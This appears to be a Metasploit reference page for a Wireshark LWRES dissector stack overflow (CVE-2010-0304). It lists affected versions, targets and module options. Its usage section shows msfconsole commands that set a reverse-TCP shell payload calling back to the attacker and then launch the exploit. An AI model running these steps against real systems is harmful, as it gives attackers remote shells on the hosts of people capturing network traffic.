Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue. This version loops, sending the packet every X seconds until the job is killed.
Exploit Rank
- Great
Exploit Authors
- babi < >
- jduck < jduck [at] metasploit.com >
- redsand < >
Vulnerability References
- CVE-2010-0304
- OSVDB-61987
- BID-37985
- http://www.wireshark.org/security/wnpa-sec-2010-02.html
- http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?...
Exploit Targets
- 0 - tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)
- 1 - wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)
- 2 - wireshark 1.2.5 on RHEL 5.4 (x64)
- 3 - wireshark 1.2.5 on Mac OS X 10.5 (x86)
- 4 - wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86) (default)
Exploit Development
Similar Exploit Modules
- exploit/multi/misc/batik_svg_java
- exploit/multi/misc/hp_vsa_exec
- exploit/multi/misc/java_rmi_server
- exploit/multi/misc/openview_omniback_exec
- exploit/multi/misc/veritas_netbackup_cmdexec
- exploit/multi/misc/wireshark_lwres_getaddrbyname
- exploit/multi/misc/zend_java_bridge
Exploit Usage Information
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/multi/misc/wireshark_lwres_getaddrbyname_loop
msf exploit(wireshark_lwres_getaddrbyname_loop) > show payloads
msf exploit(wireshark_lwres_getaddrbyname_loop) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(wireshark_lwres_getaddrbyname_loop) > set LHOST [MY IP ADDRESS]
msf exploit(wireshark_lwres_getaddrbyname_loop) > exploit
Exploit Module Options
| DELAY | This option sets the delay between sent packets (default: 5) |
| INTERFACE | The name of the interface |
| RHOST | The target address (default: 239.255.255.250) |
| RPORT | The target port (default: 921) |
| SHOST | This option can be used to specify a spoofed source address |
| SNAPLEN | The number of bytes to capture (default: 65535) |
| TIMEOUT | The number of seconds to wait for new data (default: 500) |
| CHOST | The local client address |
| CPORT | The local client port |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| ExitOnSession | Return from the exploit after a session has been created |
| GATEWAY | The gateway IP address. This will be used rather than a random remote address for the UDP probe, if set. |
| NETMASK | The local network mask. This is used to decide if an address is in the local network. |
| UDP_SECRET | The 32-bit cookie for UDP probe requests. |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |